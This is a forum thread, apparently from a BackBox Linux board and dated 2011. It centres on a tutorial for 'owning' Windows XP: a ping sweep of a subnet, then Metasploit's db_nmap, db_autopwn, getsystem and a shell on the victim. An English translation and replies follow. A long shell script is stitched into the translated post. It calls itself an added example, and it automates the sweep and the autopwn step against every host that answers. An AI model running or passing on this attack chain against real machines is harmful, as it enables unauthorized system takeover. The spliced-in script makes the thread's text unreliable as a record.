Author Topic: Owning Windows XP with Backbox  (Read 9219 times)

C4tl3ash

  • Newbie
  • *
  • Posts: 1
on: March 24, 2011, 08:09:48 PM
Owning Windows XP with BackBox


Link Video: http://www.youtube.com/watch?v=hZQ8HpF2Pho
A relatively simple guide, using Metasploit's autopwn module ^^

Tools used:
  • Metasploit 3 ( included in BackBox )
  • NMap ( included in BackBox )
  • AutoPwn module ( included in Metasploit 3 )
  • PostgreSQL ( or another db ^^ )

Command list:
Code:
sudo /etc/init.d/postgresql-8.4 start
nmap -sP -T4 192.168.1.1-255
sudo msfconsole
db_driver postgresql
db_connect postgres_username:"password"@localhost/msf
db_nmap -sS -sV -T4 -O 192.168.1.235
db_autopwn -x -e -p -R great
sessions -i 1
getsystem
shell

Theory notes:
I don't think they're needed :3

Explanation:
 First of all we need to start the Postgres database, with the command:
 sudo /etc/init.d/postgresql-8.* start
next we find the victim's IP address with the powerful port scanner NMap,
so we run:
nmap -sP -T4 192.168.1.1-255

    * -sP: Increases speed, since it doesn't do any port scanning but only detects whether the host is up via ping :)
    * -T4: Speed level, ranging from -T1 ( Paranoid ) to -T5 ( Insane ); usually this value doesn't change much, since the modes < -T3 are mainly used for anti-intrusion systems etc...
    * 1-255: Runs the scan over a range of addresses from 192.168.1.1 to 192.168.1.255


 once we have found the address, which in my case was 192.168.1.235, copy it and open msfconsole,
and type:

db_driver postgresql


next we create our database:

db_connect postgres_username:"password"@localhost/msf

once that is done, run the nmap module with:

db_nmap -sS -sV -T4 -O 192.168.1.235

the results are automatically saved in the db, so once it finishes run:

db_autopwn -x -e -p -R great

    * -R great: selects only the exploits that have a high chance of succeeding :)

and as soon as it finishes, list the sessions that were created with

sessions -l

and choose one to interact with via:

sessions -i ID


c4tl3ash~



trenatos

  • Newbie
  • *
  • Posts: 2
Reply #1 on: July 15, 2011, 03:08:17 AM
Any chance of getting this translated into English? I think more people would have a use for it if it were available in multiple languages.



vincenzo

  • Full Member
  • ***
  • Posts: 103
Reply #2 on: July 15, 2011, 10:28:25 AM
Link Video: http://www.youtube.com/watch?v=hZQ8HpF2Pho
This is a relatively simple guide based upon the Metasploit Autopwn module.

Tools Involved:
  • Metasploit 3 ( included in Backbox )
  • NMap ( included in BackBox )
  • AutoPwn module ( included in Metasploit 3 )
  • Postgresql ( or another db )

Commands to be Issued:
Code:
sudo /etc/init.d/postgresql-8.4 start
nmap -sP -T4 192.168.1.1-255
sudo msfconsole
db_driver postgresql
db_connect postgres_username:"password"@localhost/msf
db_nmap -sS -sV -T4 -O 192.168.1.235
db_autopwn -x -e -p -R great
sessions -i 1
getsystem
shell

Theory:
Not needed.

Explanation:
First, you'll need to start the Postgres database service by issuing the following command:
Code:
sudo /etc/init.d/postgresql-8.* start

Then, find the victim's target IP with the powerful port-scanning tool NMap:
Code:
nmap -sP -T4 192.168.1.1-255

  • -sP: increases the scanning speed as it doesn't actually do any port scanning;
    it just detects whether a host is up or not, through a simple ping.
  • -T4: speed level, ranging from -T1 (Paranoid) to -T5 (Insane). This value doesn't vary that much, since the values < -T3
    are mainly employed in anti-intrusion systems etc...
  • 1-255: scans IP addresses over the range between 192.168.1.1 and 192.168.1.255

Once you have the IP (192.168.1.235 in my example), copy it and start an msfconsole session. Then, type:
Code:
db_driver postgresql

Next, create your database:
Code:
db_connect postgres_username:"password"@localhost/msf

After that, execute the nmap module:
Code:
db_nmap -sS -sV -T4 -O 192.168.1.235

The results will be automatically saved in your db. Then, give the following command:
Code:
db_autopwn -x -e -p -R great

  • -R great: filters only the exploits with better chances to succeed :)

Check out the created sessions with:
Code:
sessions -l

Finally, select one of them:
Code:
sessions -i ID
« Last Edit: July 15, 2011, 01:08:10 PM by vincenzo »

You cannot teach a man anything. You can only help him discover it within himself.
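The procedure in C4tl3ash's post and vincenzo's translation above (ping sweep, copy the IP off the screen, type db_connect and db_nmap into msfconsole) as one repeatable script. This is an added example, not code from either post or from BackBox. It assumes nmap and msfconsole are on PATH, that PostgreSQL has already been started as in the post, and it reuses the post's placeholder credentials postgres_username / password and database msf; the resource-file approach (`nmap -oG -` for greppable output, `msfconsole -r` to replay commands) and the AUTOPWN switch are choices made here, not something the posts describe. The sample nmap output embedded in the script is constructed so the parser can be run offline.

```shell
#!/bin/sh
# Added example, not code from the post or from BackBox: the manual steps
# (ping sweep, copy the IP, type db_connect/db_nmap into msfconsole) as a script.
# nmap's greppable output (-oG -) is parsed for the hosts that answered, and the
# msfconsole steps are written to a resource file that msfconsole -r replays.
# Assumed: nmap and msfconsole on PATH, PostgreSQL already started (as in the
# post), and the post's placeholder credentials postgres_username / password.

# Credentials in the db_connect form used by the post (override with MSF_DB).
MSF_DB="${MSF_DB:-postgres_username:password@localhost/msf}"

# Read nmap -oG output on stdin and print the IPs of hosts reported as up.
# For a ping sweep each answering host is one "Host: <ip> (<name>) Status: Up" line.
parse_up_hosts() {
    awk '/^Host:/ && /Status: Up/ { print $2 }'
}

# Print an msfconsole resource script: connect to the database, run db_nmap
# against every host given as an argument, then list what was recorded.
# db_driver and db_autopwn are the Metasploit 3 commands from the post's list;
# raffaele's reply below notes that newer Metasploit dropped db_autopwn, so that
# step is only emitted when AUTOPWN=1.
write_resource_script() {
    printf 'db_driver postgresql\n'
    printf 'db_connect %s\n' "$MSF_DB"
    for host in "$@"; do
        printf 'db_nmap -sS -sV -T4 -O %s\n' "$host"
    done
    printf 'hosts\nservices\n'
    if [ "${AUTOPWN:-0}" = 1 ]; then
        printf 'db_autopwn -x -e -p -R great\nsessions -l\n'
    fi
}

# Constructed sample of `nmap -sP -oG -` output, so the parser can be exercised
# without a network (the second host is the post's 192.168.1.235).
SAMPLE_NMAP_OG='# Nmap scan initiated as: nmap -sP -T4 -oG - 192.168.1.1-255
Host: 192.168.1.1 (router.lan)  Status: Up
Host: 192.168.1.235 ()  Status: Up
# Nmap done -- 255 IP addresses (2 hosts up) scanned in 3.21 seconds'

# Live run only when asked for: sweep the range, write the .rc, start msfconsole.
if [ "${1:-}" = "--live" ]; then
    up_hosts=$(nmap -sP -T4 -oG - "${2:-192.168.1.1-255}" | parse_up_hosts)
    [ -n "$up_hosts" ] || { echo "no hosts answered the sweep" >&2; exit 1; }
    rc_file=$(mktemp)
    # shellcheck disable=SC2086  # splitting the IP list into words is intended
    write_resource_script $up_hosts > "$rc_file"
    sudo msfconsole -r "$rc_file"
else
    # Offline demonstration: parse the constructed sample instead of scanning.
    printf '%s\n' "$SAMPLE_NMAP_OG" | parse_up_hosts
fi
```

Run it as `sh autoscan.sh --live 192.168.1.1-255` to sweep the range from the post and hand every responding host to db_nmap; without arguments it only parses the embedded sample. Set `AUTOPWN=1` on a Metasploit 3 install to append the post's db_autopwn step to the resource file.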




trenatos

  • Newbie
  • *
  • Posts: 2
Reply #3 on: July 15, 2011, 04:08:32 PM
Thank you Vincenzo!



Vlad

  • Newbie
  • *
  • Posts: 2
Reply #4 on: November 30, 2011, 11:40:07 PM
While attempting this exploit I got stuck on something that many of you would consider stupid, but not me, since I'm quite a newbie in this field :). I was wondering if any of you could explain why I get the following error when I reach the "db_autopwn" command:

Code:
[-] Unknown command: db_autopwn.



raffaele

  • Administrator
  • Hero Member
  • *****
  • Posts: 506
Reply #5 on: December 01, 2011, 11:30:07 AM
Hi Vlad, it seems that in the newer versions of Metasploit "db_autopwn" is no longer supported...

raffaele@backbox:~$ Get root or die tryin'


SYSTEM_OVERIDE

  • Guest
Reply #6 on: December 01, 2011, 03:31:23 PM
Hi Vlad, it seems that in the newer versions of Metasploit "db_autopwn" is no longer supported...

Confirmed.



Vlad

  • Newbie
  • *
  • Posts: 2
Reply #7 on: December 01, 2011, 06:49:02 PM
Great, thanks :).



Escalion

  • Newbie
  • *
  • Posts: 1
Reply #8 on: December 07, 2011, 07:06:39 PM
I found this fork with autopwn still enabled. Maybe it might be an idea to use this fork optionally in backbox?



dravok

  • Jr. Member
  • **
  • Posts: 84
Reply #9 on: December 11, 2011, 03:13:11 PM
With the database attack it runs through all the attempts... but doesn't Hail Mary do the same thing?



berghem

  • Jr. Member
  • **
  • Posts: 97
    • http://lorenzistefano.com
Reply #10 on: December 11, 2011, 07:17:23 PM
I don't have much experience, but I think autopwn has been largely replaced by Armitage, or am I wrong?